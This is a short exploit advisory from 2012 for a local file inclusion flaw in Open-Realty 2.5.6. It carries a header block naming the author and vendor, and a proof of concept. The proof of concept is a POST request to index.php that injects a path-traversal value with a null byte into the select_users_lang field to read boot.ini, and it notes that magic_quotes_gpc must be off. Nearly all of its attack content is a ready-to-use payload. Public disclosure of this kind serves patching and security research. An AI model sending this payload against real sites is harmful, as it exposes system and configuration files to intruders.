Open-Realty version 2.5.6 suffers from a local file inclusion vulnerability. Please note that local file inclusion issues have already been found in this software in versions up to 2.5.8.
24a826948bbe7abd9a542e43ff3cbd1ca8aa1726a299b6ff7a498c23d2a9e47a
#################################################
### Exploit Title: Open-Realty v2.5.6 Local File Inclusion Vulnerability
### Date: 06/10/2012
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.open-realty.org/
### Software Link: http://www.open-realty.org/release/open-realty2.5.6.zip
### Version: 2.5.6
### Tested on: Linux/Windows
#################################################
1- Local File Inclusion :
* P.O.C :
POST http://127.0.0.1/open-realty2.5.6/index.php
Inject by POST method:
select_users_lang=../../../../../../../boot.ini%00
############################################
# Note :
Must be magic_quotes_gpc = Off
# Greetz to my friendz